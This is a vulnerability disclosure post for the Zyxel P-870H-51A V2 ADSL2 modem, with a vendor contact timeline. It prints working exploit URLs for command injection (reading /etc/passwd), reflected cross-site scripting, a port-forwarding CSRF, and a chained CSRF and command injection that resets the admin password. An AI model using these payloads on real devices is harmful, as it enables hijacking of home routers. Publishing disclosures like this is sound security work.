Vulnerability report: Zyxel P-870H-51A V2

1 minute read
January 11, 2015

This is a vulnerability report for Zyxe lP-870H-51A V2 ADSL2 modem (multiple vulnerabilities).

Technical specifications

  • Product: Zyxel P-870H-51A V2
  • Firmware: 1.01(AWZ.4)
  • Vulnerability type: cross-site request forgery, cross-site scripting, command injection

Disclosure timeline

  • 6th May 2014 - Contacted vendor (never received reply)
  • 28th May 2014 - Contacted NSCS-FI
  • 11th August 2014 - Received reply from NSCS-FI. They had contacted vendor. The vendor had replied, that the product is no longer supported - asked to make sure that the firmware was updated.
  • 12th January 2015 - Public disclosure

Remote Command Execution

Requires that the user is logged in. Output is shown. Can be exploited remotely as CSRF vulnerability (however, the attacker does not receive the output).

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20cat%20/etc/passwd&diagTestType=1

Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20sh%20-c%20ifconfig%20-a&diagTestType=1

Cross-site scripting

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi';alert('xss');//&diagTestType=1

Cross-site request forgery

Can do many actions, such as add port forwarding rules to internal network. Just redirect the victim to following URL:

http://192.168.1.1/portForwarding.cmd?action=add&enableNAT=TRUE&srvName=asdf&dstWanIf=ptm0_1&srvAddr=192.168.1.123&wanIp=&proto=1,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,

Requests that trigger “change password” and “reboot” require sessionKey-parameter and thus cannot be forged. Wait, let’s see again. The device contains a non-standard Unix passwd command - which does not require the “current” password:

 > passwd

Usage: passwd <supervisor|admin|user> <password>
 passwd --help
 >

Hence, by combining this CSRF vulnerability and RCE, the attacker can remotely change the admin password:

http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20passwd%20admin%20newpasswd

Leave a Comment